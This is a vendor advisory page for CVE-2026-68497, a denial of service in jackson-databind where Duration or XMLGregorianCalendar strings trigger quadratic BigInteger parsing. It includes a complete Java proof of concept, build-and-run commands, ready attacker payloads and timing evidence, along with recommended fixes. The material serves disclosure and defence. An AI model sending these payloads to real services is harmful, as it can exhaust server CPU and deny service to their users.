Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2026-68497

jackson-databind: Duration XMLGregorianCalendar Unbounded Number Parse DoS
Back to all
CVE

CVE-2026-68497

jackson-databind: Duration XMLGregorianCalendar Unbounded Number Parse DoS

Summary

jackson-databind 3.2.1 deserializes a JSON string bound to a javax.xml.datatype.Duration or javax.xml.datatype.XMLGregorianCalendar field by passing the raw string verbatim to DatatypeFactory.newDuration(value) / newXMLGregorianCalendar(value). Per the XML-Schema lexical grammar these factory methods accept numeric components of arbitrary length, which the JDK materializes into java.math.BigInteger / BigDecimal using the native BigInteger(String) constructor (an O(n²) parser). Because the digits reside inside a JSON string token, jackson-core's StreamReadConstraints.maxNumberLength guard (which bounds only JSON number tokens) never fires, so there is no length limit anywhere on this path. An unauthenticated attacker can submit a single small request (e.g. ~1–5 MB) that forces tens of seconds to minutes of single-thread CPU consumption, yielding a denial of service under the default JsonMapper.builder().build() mapper with no polymorphic typing or special configuration.

Details

StreamReadConstraints.maxNumberLength (jackson-core, default 1000) bounds the text length of JSON number tokens only; it does not apply to digits inside a JSON string token (maxStringLength default is 100,000,000). jackson's own value binders compensate for this gap elsewhere — NumberDeserializers explicitly call streamReadConstraints().validateIntegerLength(text.length()) / validateFPLength(text.length()) before parsing a stringified number (NumberDeserializers.java:1063, :1139). The XML-datatype deserializer omits this identical pre-check.

CoreXMLDeserializers registers Std deserializers by default for any field typed javax.xml.datatype.Duration or XMLGregorianCalendar (findBeanDeserializer), with no opt-in required. Std._deserialize hands the attacker string straight to the datatype factory:

protected Object _deserialize(String value, DeserializationContext ctxt) {
    switch (_kind) {
    case TYPE_DURATION:
        return _dataTypeFactory.newDuration(value);                 // attacker lexical string
    case TYPE_G_CALENDAR:
        Date d;
        try { d = _parseDate(value, ctxt); }
        catch (DatabindException e) {
            return _dataTypeFactory.newXMLGregorianCalendar(value); // attacker lexical string
        }
        return _gregorianFromDate(ctxt, d);
    }
    throw new IllegalStateException();
}

Per the XSD lexical rules, newDuration parses each numeric component (years, months, …) into a BigInteger, and newXMLGregorianCalendar parses fractional seconds into a BigDecimal. The JDK uses the native BigInteger(String) / BigDecimal(String) constructors, which are O(n²) in the digit count. A short JSON string such as "P" + "9"×N + "Y" therefore forces the allocation and O(N²) parse of an N-digit BigInteger, entirely downstream of every jackson-core constraint.

Vulnerable Code Location

  • src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:137

  — newDuration(value) (TYPE_DURATION)

  • src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:147

  — newXMLGregorianCalendar(value) (TYPEGCALENDAR fallback)

  • Registration (default, no opt-in):

  src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:42-46

  (findBeanDeserializer returns Std for XMLGregorianCalendar / Duration)

  • Contrast — correct length-guard pattern already used elsewhere in the library:

  src/main/java/tools/jackson/databind/deser/jdk/NumberDeserializers.java:1063,1139

Proof of Concept

PoC source (Vuln07_DurationDoS.java). It uses only the public ObjectMapper.readValue API and a default mapper; the only "special" element is a normal DTO exposing a javax.xml.datatype.Duration field.

package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
import javax.xml.datatype.Duration;
/**
 * Vuln 7: Unbounded numeric allocation / CPU DoS via Duration lexical deserialization.
 * A short JSON string forces parsing of a huge BigInteger inside DatatypeFactory.newDuration.
 */
public class Vuln07_DurationDoS {
    public static class Cfg { public Duration ttl; }
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = JsonMapper.builder().build();
        int digits = Integer.getInteger("digits", 5_000_000);
        // Baseline small parse.
        long t0 = System.nanoTime();
        mapper.readValue("{\"ttl\":\"P1Y\"}", Cfg.class);
        long tBase = System.nanoTime() - t0;
        System.out.println("Baseline (P1Y) parse: " + (tBase/1_000_000) + " ms");
        String big = "P" + "9".repeat(digits) + "Y";
        String json = "{\"ttl\":\"" + big + "\"}";
        System.out.println("Payload JSON size ~ " + json.length() + " bytes (year component = " + digits + " digits)");
        long t1 = System.nanoTime();
        try {
            Cfg c = mapper.readValue(json, Cfg.class);
            long dt = System.nanoTime() - t1;
            System.out.println("Parsed giant Duration in " + (dt/1_000_000) + " ms; years field type materialized as BigInteger");
            System.out.println("RESULT: VULNERABLE - " + digits + "-digit BigInteger parsed from a "
                    + json.length() + "-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)");
        } catch (Throwable t) {
            long dt = System.nanoTime() - t1;
            System.out.println("After " + (dt/1_000_000) + " ms threw " + t.getClass().getName() + ": " + t.getMessage());
        }
    }
}

Minimal HTTP-shaped payload (what an attacker sends):

{ "ttl": "P99999999999999999999…9Y" }   // 'P' + N nines + 'Y', N up to ~100,000,000

An XMLGregorianCalendar field is equally affected via the fractional-seconds path, e.g.

{ "at": "0000-01-01T00:00:00." + "9"×N }.

Execution Steps

The PoC needs only the three Jackson 3.2.1 jars on the classpath; it can be built and run with plain javac/java (no Maven required). The jars are the standard published artifacts (here resolved from the local Maven cache ~/.m2, but any copy works).

## 0. Locate the three dependency jars (published Maven artifacts).
M2="$HOME/.m2/repository"
DB="$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar"
CORE="$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar"
ANN="$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar"
CP="$DB:$CORE:$ANN"
## If not already cached, fetch them once, e.g.:
## mvn -q dependency:get -Dartifact=tools.jackson.core:jackson-databind:3.2.1
## (jackson-core 3.2.1 and jackson-annotations 2.22 come as transitive deps)
## 1. Compile with javac (single source file).
mkdir -p out
javac -cp "$CP" -d out src/main/java/com/poc/Vuln07_DurationDoS.java
## 2. Quick confirmation (~11 s): 1,000,000-digit year component.
java -Xmx2g -Ddigits=1000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS
## 3. Full-severity demonstration (~293 s): 5,000,000-digit year component.
java -Xmx2g -Ddigits=5000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS

The digits system property controls the number of 9 characters in the year component; JSON payload size ≈ digits + 12 bytes. Increase toward the default 100,000,000 maxStringLength to scale cost further.

Environment used for the evidence below: jackson-databind 3.2.1, jackson-core 3.2.1, jackson-annotations 2.22; OpenJDK 25 on macOS (darwin), default JsonMapper.builder().build().

Reproduction Evidence

Deterministic values (payload byte count, resulting bit-length) are exact across runs; timings vary with load. Two independent runs at different sizes:

digits = 5,000,000 (~5 MB payload):

Baseline (P1Y) parse: 27 ms
Payload JSON size ~ 5000012 bytes (year component = 5000000 digits)
Parsed giant Duration in 293175 ms; years field type materialized as BigInteger
RESULT: VULNERABLE - 5000000-digit BigInteger parsed from a 5000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)

digits = 1,000,000 (~1 MB payload, for fast repeatability):

Baseline (P1Y) parse: 53 ms
Payload JSON size ~ 1000012 bytes (year component = 1000000 digits)
Parsed giant Duration in 11155 ms; years field type materialized as BigInteger
RESULT: VULNERABLE - 1000000-digit BigInteger parsed from a 1000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)

Interpretation: a normal "P1Y" value parses in tens of milliseconds; a ~1 MB attacker payload consumes ~11 s and a ~5 MB payload ~293 s of single-thread CPU — a 5–6 order-of-magnitude amplification. The super-linear growth (≈26× cost for 5× payload) is consistent with the JDK's O(n²) BigInteger(String) constructor. The cost occurs inside DatatypeFactory.newDuration, downstream of jackson-core's StreamReadConstraints (independently confirmed: the same digit sequence supplied as a bare JSON number token is rejected with StreamConstraintsException, whereas inside a string token it is not bounded).

Impact

An unauthenticated attacker can stall a request-processing thread for tens of seconds to minutes and allocate a large BigInteger/BigDecimal from a single small request. Because the cost is CPU-bound and super-linear, a handful of concurrent requests can saturate the server's worker threads and CPU, denying service to all users. The exposure requires only that a bound type expose a javax.xml.datatype.Duration or XMLGregorianCalendar field  common in applications that ingest XML-schema derived data, SOAP/JAXB-adjacent models, or configuration carrying XSD durations — and fires under the default mapper with no polymorphic typing.

Recommended Fix

Apply the same validate-length-then-parse idiom the core NumberDeserializers already use:

  1. In CoreXMLDeserializers.Std._deserialize, enforce a maximum raw-string length before

   calling newDuration(value) / newXMLGregorianCalendar(value) — e.g. reject inputs

   longer than ctxt.streamReadConstraints().getMaxNumberLength() (or a dedicated bound),

   routing over-length input through ctxt.handleWeirdStringValue(...).

  1. Alternatively, validate the lexical form against a bounded regex and cap the digit count

   of each numeric component before delegating to DatatypeFactory.

  1. Document that Duration / XMLGregorianCalendar fields bound from untrusted input must

   be length-limited at the transport layer.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
7.5
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
C
H
U
7.5
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Related Resources

No items found.

References

https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-q4xh-88c3-wmh7, https://nvd.nist.gov/vuln/detail/CVE-2026-68497, https://github.com/FasterXML/jackson-databind/pull/6127, https://github.com/FasterXML/jackson-databind/commit/a99b7e74c8928f43f6975773a8c862c8316178bd, https://github.com/FasterXML/jackson-databind, https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.18.10, https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.21.6, https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.22.2, https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-3.1.6, https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-3.2.2

Severity

7.5

CVSS Score
0
10

Basic Information

Base CVSS
7.5
EPSS Probability
0.00581%
EPSS Percentile
0.45826%
Introduced Version
3.2.0,2.14.0,3.0.0-rc1,2.4.0-rc1,2.19.0,2.22.0,2.0.0-RC1,0
Fix Available
3.2.2,2.18.10,3.1.6,2.21.6,2.22.2,2.0.0-r9,0.28.0-r11,6.2.10-r1,6.3.0-r2,5.19.11-r1,4.18.1-r14,2.19.0-r4,2.19.0-r2,2.11.0-r5,1.8.0-r1,4.0.13-r7,4.2.4-r7,4.0.13-r6,3.0.0-r33,3.1.0-r40,3.2.3-r19,3.3.2-r3,3.0.0-r15,3.1.0-r16,3.2.3-r14,3.3.2-r5,10.2.0-r1,3.3.3-r3,3.3.3-r1,8.8.40-r1,8.6.39-r14,8.7.42-r1,4.0.21-r2,4.1.12-r2,5.0.9-r8,4.0.21-r3,4.1.12-r3,5.0.8-r16,5.0.1-r3,0.5.4-r36,0.6.3-r18,0.7.0-r12,3.32.5-r1,8.5.0.235-r1,8.5.0.230-r1,2.5.146-r5,2.5.146-r6,1.7.0.1-r1,4.14.4-r1,1.6.1-r5,1.6.1-r4,38.0.0-r0,9.2.8-r17,9.3.8-r10,9.4.7-r2,9.5.4-r2,9.2.8-r16,9.3.8-r3,9.4.7-r4,9.5.4-r3,1.16.1-r1,1.16.1-r2,2.1.0-r4,0.13.0-r2,13.9.0-r0,13.8.1-r1,2.27.6-r3,2.28.5-r3,3.0.1-r5,8.14.5-r8,9.8.0-r1,1.6.0-r18,3.3.6-r19,2.7.0-r43,15.0.22-r18,15.1.7-r30,15.2.6-r28,16.0.15-r1,16.1.4-r12,16.2.3-r1,2.555.3-r3,2.568.3-r2,2.15.0-r6,5.6.3-r4,1.5.0-r15,1.5.0-r8,3.7.2-r61,3.8.1-r63,3.9.2-r16,4.0.2-r13,4.1.2-r10,4.2.2-r1,4.3.1-r10,1.1.0-r3,1.1.0-r4,4.1.2-r12,4.3.1-r8,1.23.0-r1,2025.4.6-r18,2026.0.7-r7,2026.1.7-r1,2026.2.15-r1,2026.3.5-r1,2025.4.6-r11,2026.0.7-r1,6.5.1-r19,26.7.4-r3,1.20.3-r19,1.22.3-r16,1.23.1-r6,1.20.3-r17,1.22.3-r13,1.23.1-r7,4.14.0-r26,9.4.7-r3,0.1.126-r1,1.70.5-r1,3.2.4-r3,2026.02.3-r6,2026.04.0-r5,2026.05.0-r14,2026.06.0-r11,2026.07.1-r4,5.26.31-r1,26.04.6-r3,2023.45-r17,2025.20-r3,5.5.0-r25,5.5.0-r20,2.19.6-r16,3.9.0-r0,1.5.1-r22,1.5.1-r18,3.6.3-r1,26.5.7-r29,26.6.7-r2,0.5.2-r2,0.5.2-r3,4.1.1-r1,3.8.4-r11,2.7.0-r10,10.0.0-r14,9.10.1-r17,10.0.0-r7,9.10.1-r6,26.9.0.129388-r1,4.2.0-r12,4.1.2-r11,2.0.7-r6,0.18.0-r2,0.18.0-r1,1.2.0-r6,1.2.0-r5,0.10.5-r32,4.3.1.5-r2,3.8.2-r1,6.16.0-r1,6.15.3-r3,483-r8,13.9-r31,4.14.8-r2,41.0.1-r3,7.3.0-r5,3.6.1-r29,3.8.7-r1,3.9.6-r2,3.8.7-r2

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading